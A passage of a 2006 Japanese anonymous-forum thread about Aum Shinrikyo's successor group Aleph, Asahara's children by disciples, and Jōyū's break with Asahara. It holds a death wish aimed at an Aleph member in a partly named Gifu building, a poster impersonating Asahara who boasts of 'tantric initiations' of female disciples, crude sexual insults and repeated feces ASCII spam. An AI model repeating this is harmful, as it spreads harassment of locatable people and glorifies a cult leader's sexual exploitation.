        ,,,--─===─ヽ/へ
      /iiiiiiiiiiiiii彡≡≡≡|≡ヾ ヽ
     iiiiiiiiiiiiiiiiiii彡≡≡≡≡|≡ミミヾ丶
    iiiiiiiiiiiiiiiiiiii/ ̄ ̄ ̄ ̄ ̄ ̄\ミiiiiiヽ
   iiiiiiiiiiiiiiiiii/             \iiiiiiiゞ
   iiiiiiiiiiii/                \iiヽ
  iiiiiiiiiiiiiii《    ━━━'/  ヽ━━━ ヽミヽ
 ...iiiiiiiiii彡/      __,.::  :: __  ヽiiiii|
 ..iiiiiiiiiiiii》|             :::      |iiiii|
 iiiiiiiiiiiiiiii|,                     |iii|
..iiiiiiiiiiiiiiiiii,         ( ● ● )      .|iiii|
iiiiiiiiiiiiiiiiiiiiiii       》━━━━《       |iiiii|
iiiiiiiiiiiiiii《《《ヽ     》 / ̄ ̄\ 《     |iiiiiiii|
iiiiiiiii《《《《《《《《    《《 \ ̄ ̄/ 》》   |iiiiiiiiiii|
iiiiiiiiiiii《《《《《《《《《《《 》》   ̄ ̄  《《 》》》》》iiiii|
iiiiiiiiii《《《《《《《《《《《《《《《《《《《《》》》》》》》》》》》》》》iii|
iiiiiiiiiiiiiii巛巛巛巛巛巛巛巛巛》》》》》》》》》》》》》》IIII
iiiiiiiiiiiiiiiiiiiiii巛巛巛巛巛巛巛巛》》》》》》》》》》》》iiiiiii
久々に登場なのである。
オウム真理教も北朝鮮も追い詰められて、
訳が分からなくなっているのである。


771 :何が救済活動だ:2006/10/15(日) 09:48:20 ID:gfqV+k9i
↓こんな香具師でもアーレフに入れますか?
↓こんな香具師をアーレフは救済しますか?したことがありますか?

地獄!俺以上に絶望的な奴いる?

1 :1:2005/09/30(金) 03:01:42
現在無職所持金279円 サラ金 カード ブラック
今は前払いパックでマンガ喫茶に泊まってます
仕事する意欲はあります。 でも仕事と金と宿がない・・・
犯罪者になって捕まるしかないのでしょうか
ちなみに路上で寝るのは嫌です
たすけてーーーーーーーーーー

2 :今日のところは名無しで :2005/09/30(金) 03:17:40
人生に乙

3 :今日のところは名無しで :2005/09/30(金) 03:19:52
自分だけ特殊環境にあると思わないことだな。
ここに書き込みすらできない奴がいっぱいいるのに。
おまえが嫌がる、路上で眠る奴のほうが絶望的だよ。

4 :今日のところは名無しで :2005/09/30(金) 03:27:01
どっか、住み込みで、まっとうな所で働いてください
旅館とかなら寮もあるらしいでつ

5 :今日のところは名無しで :2005/09/30(金) 03:28:37
とりあえず土方でもなんでも仕事やるべきだね。




772 :名無しさん@3周年:2006/10/15(日) 11:06:19 ID:HGMy10BT
マル激トーク・オン・ディマンド 第289回(2006年10月13日)
麻原の神格化は大きな過ちだった
ゲスト:上祐史浩氏(アーレフ代表)

http://www.videonews.com/

773 :名無しさん@3周年:2006/10/15(日) 11:32:18 ID:g1XKTJ+g
もうしばらく経つといつもの肉まんじゅうが出てくる…

774 :名無しさん@3周年:2006/10/15(日) 12:16:19 ID:C2/KtfSt
772 有料だけど・・・・営業!


775 :名無しさん@3周年:2006/10/15(日) 12:38:10 ID:ix1cZUWM
元オウムって、麻原を否定するところまではできても
子供じみた超人願望から卒業することは、なかなかできない傾向があるよね。

やっぱり我が強いんだな。
だから苦しむ。


776 :名無しさん@3周年:2006/10/15(日) 12:46:58 ID:g1XKTJ+g
>>775 ツマラネ

777 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 13:06:24 ID:oyC3xr3v
>>775

他人の真面目な取り組みを「子供じみた」って言って切り捨てる人は自分が子供じみてることに気がついてない憐れな人。
超人願望?
いいじゃない。それって向上心の現われじゃないかw
テーラヴァーダ仏教やチベット仏教、インド・ヒマラヤヨーガだって神通力を否定しないよ。
そういうのを否定するのは実はそれを一番求めてるってことに気がついた方がいいのにw
我がつよい?
いいじゃん。
自己をキチンと確立できないものは他人に流されて生きていくしか無くなるよ。
苦しむ?
却下。
自分の我の正しい表現方法を誰も知らないだけだよ。我が強くて苦しんでいるのではなくてね。
我っていえばキリストやお釈迦さまの方が我は強いよ。よく考えてごらん。
そのくらいの自我の確立が無ければ世界宗教になんかならないからw
ということであなたの見解は自分に理解できないから、或いは自分には手に入らないからといって
相手の持ち物にケチをつける子供の歪んだ優越感に似ているw
その愚見に、注ぎ込もう。慈悲。

778 :名無しさん@3周年:2006/10/15(日) 13:48:23 ID:oFh0Fq6+
神通力には関心ないです。
麻原はじめ、麻原ファミリー、サマナたちの
下半身事情に関心があります。
よろしくお願い申しあげます。

779 :グル麻原:2006/10/15(日) 13:54:44 ID:Ge0SqL7Q
        ,,,--─===─ヽ/へ
      /iiiiiiiiiiiiii彡≡≡≡|≡ヾ ヽ
     iiiiiiiiiiiiiiiiiii彡≡≡≡≡|≡ミミヾ丶
    iiiiiiiiiiiiiiiiiiii/ ̄ ̄ ̄ ̄ ̄ ̄\ミiiiiiヽ
   iiiiiiiiiiiiiiiiii/             \iiiiiiiゞ
   iiiiiiiiiiii/                \iiヽ
  iiiiiiiiiiiiiii《    ━━━'/  ヽ━━━ ヽミヽ
 ...iiiiiiiiii彡/      __,.::  :: __  ヽiiiii|
 ..iiiiiiiiiiiii》|             :::      |iiiii|
 iiiiiiiiiiiiiiii|,                     |iii|
..iiiiiiiiiiiiiiiiii,         ( ● ● )      .|iiii|
iiiiiiiiiiiiiiiiiiiiiii       》━━━━《       |iiiii|
iiiiiiiiiiiiiii《《《ヽ     》 / ̄ ̄\ 《     |iiiiiiii|
iiiiiiiii《《《《《《《《    《《 \ ̄ ̄/ 》》   |iiiiiiiiiii|
iiiiiiiiiiii《《《《《《《《《《《 》》   ̄ ̄  《《 》》》》》iiiii|
iiiiiiiiii《《《《《《《《《《《《《《《《《《《《》》》》》》》》》》》》》》iii|
iiiiiiiiiiiiiii巛巛巛巛巛巛巛巛巛》》》》》》》》》》》》》》IIII
iiiiiiiiiiiiiiiiiiiiii巛巛巛巛巛巛巛巛》》》》》》》》》》》》iiiiiii
>>778
わたしは多くの女性の弟子にタントラのイニシエーションを施し、
多くの「陣痛」を与えたのである。
わたしの血を絶やさないために、わたしの娘達も多くの「陣痛」を得てもらい
たいものである。

780 :名無しさん@3周年:2006/10/15(日) 14:44:15 ID:EXshmxzL
うちの上階にアーレフ信者が住んでいます。
顔はいってしまっており不気味です。
毎夜 空中浮揚の修行をしているのかドスンドスンとうるさい!
注意をした後から余計ひどくなりました。
これ以上注意をすると命が危なくなるかもしれません。
岐阜のライオンズマンション○○の8階に住んでるアーレフ 死ね!

781 :阿佐谷北(本物) ◆Kcjlum1seI :2006/10/15(日) 14:55:24 ID:7xlIi4eq
>>779
>わたしは多くの女性の弟子にタントラのイニシエーションを施し、
>多くの「陣痛」を与えたのである。

教祖が何人に「タントラのイニシエーション」とやらを施したのかは知らぬが、
実際に「陣痛」を得たのはわずか数名だったとか思いますけど。

782 :名無しさん@3周年:2006/10/15(日) 15:08:42 ID:KlIlJ/IL
最終解脱者は性欲が無いので
アストラルからひっぱってきたのでつか?

783 :名無しさん@3周年:2006/10/15(日) 15:32:29 ID:fhUrj2Ox
>>765
>では、俺も寝ますね。

男と練るんだろ。またアナル売りか?

784 :名無しさん@3周年:2006/10/15(日) 15:37:22 ID:gAgcKF5F
上祐、村岡、野田、二ノ宮、杉浦兄弟は遺族被害者に直接謝罪に行け!!
特に野田、桃源事件被害者へだ!!


785 :名無しさん@3周年:2006/10/15(日) 15:37:27 ID:C2/KtfSt
>>783
おまえの思考ってほんと低レベルだよね。

786 :名無しさん@3周年:2006/10/15(日) 16:56:35 ID:/tje+bdU
アナル売ってちゃ−戦にゃ勝てね−ぞ

787 :名無しさん@3周年:2006/10/15(日) 16:56:47 ID:EDUPRf+Y
>>783
しつこいんだよ。ナルコ脳症の麻原盲信変態が。
お前の願望書いてんじゃねえよ。
腐れ粗チン切り落としてから寝言吐けって言ってんだろ?
麻原にケツ貸す妄想に浸ってるクセによ ゲラ

788 :名無しさん@3周年:2006/10/15(日) 17:18:11 ID:EDUPRf+Y
>>786
お前も現役のナルコ脳症麻原盲信変態症候群患者か。他人の性にまで口だしするその傲慢さはもう治療不可能なのでこれ以上症状が悪くならないように入院してろよ。病棟から逃げ出してくんな。

789 :名無しさん@3周年:2006/10/15(日) 17:43:31 ID:aoz6SLb/
>>772 :上祐氏のまとめ
・神を崇めても自己を神としない。
・信者と非信者を区別して極端な善悪二元論に陥らない。
・自己の理想は人間の究極として菩薩というものを設定し絶対神や如来にせず、
全てはつながっており、一体である。

790 :グル麻原:2006/10/15(日) 17:46:34 ID:Ge0SqL7Q
        ,,,--─===─ヽ/へ
      /iiiiiiiiiiiiii彡≡≡≡|≡ヾ ヽ
     iiiiiiiiiiiiiiiiiii彡≡≡≡≡|≡ミミヾ丶
    iiiiiiiiiiiiiiiiiiii/ ̄ ̄ ̄ ̄ ̄ ̄\ミiiiiiヽ
   iiiiiiiiiiiiiiiiii/             \iiiiiiiゞ
   iiiiiiiiiiii/                \iiヽ
  iiiiiiiiiiiiiii《    ━━━'/  ヽ━━━ ヽミヽ
 ...iiiiiiiiii彡/      __,.::  :: __  ヽiiiii|
 ..iiiiiiiiiiiii》|             :::      |iiiii|
 iiiiiiiiiiiiiiii|,                     |iii|
..iiiiiiiiiiiiiiiiii,         ( ● ● )      .|iiii|
iiiiiiiiiiiiiiiiiiiiiii       》━━━━《       |iiiii|
iiiiiiiiiiiiiii《《《ヽ     》 / ̄ ̄\ 《     |iiiiiiii|
iiiiiiiii《《《《《《《《    《《 \ ̄ ̄/ 》》   |iiiiiiiiiii|
iiiiiiiiiiii《《《《《《《《《《《 》》   ̄ ̄  《《 》》》》》iiiii|
iiiiiiiiii《《《《《《《《《《《《《《《《《《《《》》》》》》》》》》》》》》iii|
iiiiiiiiiiiiiii巛巛巛巛巛巛巛巛巛》》》》》》》》》》》》》》IIII
iiiiiiiiiiiiiiiiiiiiii巛巛巛巛巛巛巛巛》》》》》》》》》》》》iiiiiii
>>781
阿佐ヶ谷北よ、わたしが「陣痛」を与えたのは、数名ではなく5名である。
その結果、合計12人の子をわたしはもうけた。
君は合計12人分の「陣痛」をわずかというのだろうか?
わたしはケイマに「女にとって最高の功徳とは救済者の子を産むことである」
と説き、それをわたしは弟子達に実践させたのである。
現代日本において12人子供がいるということは、子沢山だと思うのだが、
阿佐ヶ谷北にとってはわずかなのだろうか?
わたしの子が12人いるということは、わたし自身が裁判においてはっきり
宣言しておいてある。

791 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 18:16:41 ID:oyC3xr3v
>>781
>阿佐谷北(本物)さん

ちょっと・・・いや、大変・・・呆れています・・・。
数の問題ではないでしょうに・・。
殺人者に犯されて身篭ってしまった女性の心情を何も感じないのですか?
数名だから無問題?わずかだから?それとも「名誉」だとでも?
生まれながらに殺人者を父に持ってしまう子供たちの心情は?
わずか12名だから問題なし?
事実は事実として数名。だから問題ない?
感情など取るに足らないこと?







792 :グル麻原:2006/10/15(日) 18:54:33 ID:Ge0SqL7Q
        ,,,--─===─ヽ/へ
      /iiiiiiiiiiiiii彡≡≡≡|≡ヾ ヽ
     iiiiiiiiiiiiiiiiiii彡≡≡≡≡|≡ミミヾ丶
    iiiiiiiiiiiiiiiiiiii/ ̄ ̄ ̄ ̄ ̄ ̄\ミiiiiiヽ
   iiiiiiiiiiiiiiiiii/             \iiiiiiiゞ
   iiiiiiiiiiii/                \iiヽ
  iiiiiiiiiiiiiii《    ━━━'/  ヽ━━━ ヽミヽ
 ...iiiiiiiiii彡/      __,.::  :: __  ヽiiiii|
 ..iiiiiiiiiiiii》|             :::      |iiiii|
 iiiiiiiiiiiiiiii|,                     |iii|
..iiiiiiiiiiiiiiiiii,         ( ● ● )      .|iiii|
iiiiiiiiiiiiiiiiiiiiiii       》━━━━《       |iiiii|
iiiiiiiiiiiiiii《《《ヽ     》 / ̄ ̄\ 《     |iiiiiiii|
iiiiiiiii《《《《《《《《    《《 \ ̄ ̄/ 》》   |iiiiiiiiiii|
iiiiiiiiiiii《《《《《《《《《《《 》》   ̄ ̄  《《 》》》》》iiiii|
iiiiiiiiii《《《《《《《《《《《《《《《《《《《《》》》》》》》》》》》》》》iii|
iiiiiiiiiiiiiii巛巛巛巛巛巛巛巛巛》》》》》》》》》》》》》》IIII
iiiiiiiiiiiiiiiiiiiiii巛巛巛巛巛巛巛巛》》》》》》》》》》》》iiiiiii
>>789
マイトレーヤよ、お前は代表派のメンバーに
「元代表の教材を個人でも所有しない者だけ、新教団に出家者として受け入れる」
と言っているそうだな。
もともと教団に出家した者達は私に帰依し、その教えを実践しようとして
現世を捨て出家したのである。
そして出家者がお前を尊敬しているのは、わたしがお前に正大師という
宗教的地位を与えたからである。
その出家者に対しお前は「元代表を神として見てはいけない、元代表の
教材を放棄する者だけ新教団に受け入れる」と主張している。
果たして何人がわたしの教材を放棄して、お前を信頼しついていくのだろうか?
新教団ではわたしの威を借りるのではなく、おまえ自身の宗教的力量が問われる
ことになるな。
お前の好きなようにやってみるがいい。

793 :一お馬〜♪:2006/10/15(日) 19:12:09 ID:n03m5IEN
M派サマナの方が開祖の教材を放棄されるのであれば、私がお預かりして
もし将来再度入用になられたときには責任をもってお返し申し上げますが
いかがでしょうか。殺人カルト研究のための貴重な資料をみすみす捨てて
しまうのは勿体無いと思います。

794 :死刑!!麻原さっさと死刑!!!!:2006/10/15(日) 20:04:41 ID:q63QUHNZ
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


795 :死刑!!麻原さっさと死刑!!!!:2006/10/15(日) 20:08:27 ID:q63QUHNZ
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


796 :さくら:2006/10/15(日) 20:09:52 ID:RYGe8iim
グル麻原さん

久しぶりに拝見できて嬉しいです。
カキコ楽しみにしてます。(*^^*)

797 :糞麻原へ捧げる昼便:2006/10/15(日) 20:13:37 ID:q63QUHNZ
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


798 :糞麻原へ捧げる昼便:2006/10/15(日) 20:14:26 ID:q63QUHNZ
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


799 :糞麻原へ捧げる昼便:2006/10/15(日) 20:16:12 ID:q63QUHNZ
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


800 :名無しさん@3周年:2006/10/15(日) 20:29:21 ID:cjOf28Hw
>>791
不思議なのですが
その身篭った女性の心情を実際に知らないで
一方的に想像して驚いていることを何とも思わないのですか?



801 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 20:43:19 ID:oyC3xr3v
>>800

もしもし?
それは想像力欠如ですよ?人間性の欠如と言ってもいい。
相手の気持ちを慮らないでどうします?
オウムの方はその傾向があるから問題なのです。
身篭った方が隠れるように暮らしているのはどうお考えですか?
まさか、いつか「自分の子は救世主のご落胤である」とか名乗り出るとでも?
ケイマさんの陳述見ました?
>>620をお読みください。
石井さんでさえそう思っています。そして子供とひっそりと暮らし、麻原の子であることを隠しながら生きているそうです。

で、
あなたは相手の苦しみには無関心?
実際にはそんなことはないと?

802 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 20:48:01 ID:oyC3xr3v
>>800

それとも相手の苦しみを理解しようという努力は無意味だと?
まあ、相手がそれで苦しんでなければそれは大きなお世話ですが、それなら
隠れて暮らしているのはなぜ?
名乗り出てご家族に加えて貰えばいいじゃないですか?

803 :名無しさん@3周年:2006/10/15(日) 20:53:38 ID:cjOf28Hw
>>801
想像と現実は違います。
想像するのは個人の自由ですが
驚くところまで行くほど
自分の想像を過信はしません。
石井さんのことも含め
事実を自分で確かめるでしょう。
(彼女自身のかきこみなら別ですが)
苦しみには想像を超えたいろんな苦しみがあります。
それを少し知っているので
他人についても無責任な想像で
短絡的な断定はできないと考えます。


804 :アーチャリー:2006/10/15(日) 20:56:18 ID:GcO6d0iC
┌v ''''i''''v┐
           (. ){.  |  } .)  
.           ( .)゙'ヽ_,ノー'
.          `ー' ,、.┴┴ 、
            ノ >-─|<`ヽ、
            く へ,   V、_,/
          (⌒ヽ\ノ,〉 >'、\/⌒j 
         { ヽ、  テ彡⌒ ⌒}  ノ | 
         | }  丶 . .,,___ノ、ノ/{ i
         |. {      人    } |
        ⊆ニゝ    (;.__.;)  ヽニ⊇
               (;;:::.:.__.;)
              (;;:_:.___:_:_ :)     
             (;;;::_.:_. .:; _:_ :.)



805 :よろしかったらどうぞ:2006/10/15(日) 20:58:52 ID:GcO6d0iC

           ┌v ''''i''''v┐
           (. ){.  |  } .)  
.           ( .)゙'ヽ_,ノー'
.          `ー' ,、.┴┴ 、
            ノ >-─|<`ヽ、
            く へ,   V、_,/
          (⌒ヽ\ノ,〉 >'、\/⌒j 
         { ヽ、  テ彡⌒ ⌒}  ノ | 
         | }  丶 . .,,___ノ、ノ/{ i
         |. {      人    } |
        ⊆ニゝ    (;.__.;)  ヽニ⊇
               (;;:::.:.__.;)
              (;;:_:.___:_:_ :)     
             (;;;::_.:_. .:; _:_ :.)



806 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 21:09:45 ID:oyC3xr3v
>>803
> 想像と現実は違います。

それは認めます。ですが、現実とは心の現われでもあります。
あなたは彼女たちの現実に何も感じないのならばあなたの心はそんな苦しみはないのでしょうね^^
つまり「そんなものは想像の範疇で現実には彼女たちは苦しんではいないだろうと」という想像ですなw

>想像するのは個人の自由ですが驚くところまで行くほど自分の想像を過信はしません。

もしもし?
では数の問題として書き込みはどう思われますか?

>石井さんのことも含め事実を自分で確かめるでしょう。
(彼女自身のかきこみなら別ですが)

もしもし?
陳述見ました?
で、そこから想像はできない?
それともあれは単に建前だったと仰るの?

>苦しみには想像を超えたいろんな苦しみがあります。
それを少し知っているので他人についても無責任な想像で短絡的な断定はできないと考えます。

神通力が無い俺らはそこを想像で埋めていかないと思いますが?
あなたの論はまるで「その程度は苦しみではない」と言ってるように聞こえますが?

807 :グル麻原:2006/10/15(日) 21:16:25 ID:Ge0SqL7Q
        ,,,--─===─ヽ/へ
      /iiiiiiiiiiiiii彡≡≡≡|≡ヾ ヽ
     iiiiiiiiiiiiiiiiiii彡≡≡≡≡|≡ミミヾ丶
    iiiiiiiiiiiiiiiiiiii/ ̄ ̄ ̄ ̄ ̄ ̄\ミiiiiiヽ
   iiiiiiiiiiiiiiiiii/             \iiiiiiiゞ
   iiiiiiiiiiii/                \iiヽ
  iiiiiiiiiiiiiii《    ━━━'/  ヽ━━━ ヽミヽ
 ...iiiiiiiiii彡/      __,.::  :: __  ヽiiiii|
 ..iiiiiiiiiiiii》|             :::      |iiiii|
 iiiiiiiiiiiiiiii|,                     |iii|
..iiiiiiiiiiiiiiiiii,         ( ● ● )      .|iiii|
iiiiiiiiiiiiiiiiiiiiiii       》━━━━《       |iiiii|
iiiiiiiiiiiiiii《《《ヽ     》 / ̄ ̄\ 《     |iiiiiiii|
iiiiiiiii《《《《《《《《    《《 \ ̄ ̄/ 》》   |iiiiiiiiiii|
iiiiiiiiiiii《《《《《《《《《《《 》》   ̄ ̄  《《 》》》》》iiiii|
iiiiiiiiii《《《《《《《《《《《《《《《《《《《《》》》》》》》》》》》》》》iii|
iiiiiiiiiiiiiii巛巛巛巛巛巛巛巛巛》》》》》》》》》》》》》》IIII
iiiiiiiiiiiiiiiiiiiiii巛巛巛巛巛巛巛巛》》》》》》》》》》》》iiiiiii
>>801
すべての魂の喜びを自己の喜びとし、すべての魂の喜びを増大させようとする
心の働きが慈である。
すべての魂の苦しみを自己の苦しみとし、すべての魂の苦しみを減少させようと
する心の働きが悲である。
この二つの心を合わせて慈悲という。慈悲こそが仏陀の心である。
ここでシヴァナンダは「他の魂の苦しみを慮り、悲の実践をすべきである」
と言っているのである。
シヴァナンダは教団にいるときよりも慈悲の心が増大している。
修行が進んでうれしいかぎりである。
さくらの懇願に答えて思わず登場してしまった。



808 :名無しさん@3周年:2006/10/15(日) 21:18:31 ID:KlIlJ/IL
妾に子供産ませた麻原には養育義務がありまつ
拘置所でクソ垂れ知らん顔でつか?
本妻家族共々、在家信徒からむしった金で肩代わりでつか?

809 :名無しさん@3周年:2006/10/15(日) 21:31:42 ID:cjOf28Hw
>>802
>隠れて暮らしているのはなぜ?
>名乗り出てご家族に加えて貰えばいいじゃないですか?

何のために加わる必要があるのでしょうか。
第一夫人と第二夫人が同じところに住めると考えるほうが
女性の苦しみに関して想像力が欠落しているのでは?


810 :名無しさん@3周年:2006/10/15(日) 21:35:58 ID:KlIlJ/IL
あれだけ酷い洗脳したくせに我が身大事と、狂ったふりする無責任な救世主
洗脳された信者はどうすればいいんでつか?
人生を賭け出家したサマナ
在家なのに普通の幸せ捨てさせられた信徒
松本智津夫という男はどう責任とるんでつか?

811 :名無しさん@3周年:2006/10/15(日) 21:44:35 ID:KlIlJ/IL
>>809
女性に苦しみがあるんでつか
それなら、妾に子供産ませるのは間違いでつ
種をまいたなら責任とらないといけません
悪いことしなかせら気持ちいいことしたら責任とれなくなりまつ
悪いことするとおまわりさんにつかまると妄小学校でおそわんなかったのでつか?

812 :名無しさん@3周年:2006/10/15(日) 21:46:40 ID:KlIlJ/IL
麻原は全てにおいて無責任な男

813 :名無しさん@3周年:2006/10/15(日) 21:47:59 ID:d1zUzvZi
>>810
上祐氏ではないが、信じた側の責任というのも考える必要があるのではないのかな。
なぜ信じたのか。入信や出家を決断したのも結局は自分自身であり、その背景も色々ある
でしょうが・・・そうしないと何も進歩しないというか、あなたが元オウムのサマナか信徒
であった場合、今回の事で何も教訓を得る事が出来ないのではないのかな。
もちろん、麻原の責任も大きいとは思っているよ。

814 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 21:52:24 ID:oyC3xr3v
>>809
>何のために加わる必要があるのでしょうか。

はい?
普通、生ませたのですから養育の義務がありますが?

>第一夫人と第二夫人が同じところに住めると考えるほうが
女性の苦しみに関して想像力が欠落しているのでは?

ということは彼女たちは苦しんでいるってことですね?
あなたは今女性の苦しみって語りました。
あなたにも想像できてるじゃないですか?^^

言っておきますが、第一夫人とか第二夫人って、そこが現実を直視できてない。
いいですか。第二夫人とかじゃなかった。そこさえ正知できてない。
その言葉を出した以上あなたはそういう風に考えていて、それを論拠に「彼女たちに
聞かなければ・・・」と言っていたはずです。つまり「彼女たちが苦しんでるはずはない」と。


815 :さくら:2006/10/15(日) 21:54:21 ID:fIda+iiL
>>807
出てきてくださってありがとうございます。

もしかして、あなたは・・・



尊師に宿っていた仏性?

あなたがいつの間にか尊師の肉体を離れてしまわれたのが

残念でなりません。

816 :名無しさん@3周年:2006/10/15(日) 22:06:23 ID:cjOf28Hw
806
それは認めます。ですが、現実とは心の現われでもあります。
あなたは彼女たちの現実に何も感じないのならばあなたの心はそんな苦しみはないのでしょうね^^
つまり「そんなものは想像の範疇で現実には彼女たちは苦しんではいないだろうと」という想像ですなw

どちらもあなたの想像にすぎません。
私も知らないがあなたも知っているとは思えない。
現実の資料が足らなすぎると思います。

>では数の問題として書き込みはどう思われますか?

何の書き込みでしょうか

>もしもし?
>陳述見ました?
>で、そこから想像はできない?
>それともあれは単に建前だったと仰るの?

往々にして
陳述と現実が違っていることはまたご存知のとおり。

>神通力が無い俺らはそこを想像で埋めていかないと思いますが?
>あなたの論はまるで「その程度は苦しみではない」と言ってるように>聞こえますが?

それは誤解でしょう。
ただ想像を絶することはいっぱいありますから
自分の観念を相手にあてはめることは慎重でなければなりません。
ことオウムに限ってですが。
そうしなければ真実はけしてみえてこないと思いますよ。


817 :名無しさん@3周年:2006/10/15(日) 22:06:37 ID:YcmROzX1
ID:q63QUHNZ,ID:GcO6d0iCの書き込みは一見、A派と麻原に対する侮辱の様な書き込みであるが
実はA派の一部の者達による妨害工作であり危険な麻原原理主義への回帰の芽である。気を付けなさい。
ID:fhUrj2Oxによる芝氏の侮辱も同様である。

818 :名無しさん@3周年:2006/10/15(日) 22:15:38 ID:d1zUzvZi
>>817
あなたの考えも分らなくはないけど、根拠もなく色々と決め付けを行なうのは危険
ではないかと思います。それも一つの盲信ではないかと・・・

819 :名無しさん@3周年:2006/10/15(日) 22:16:47 ID:/tje+bdU
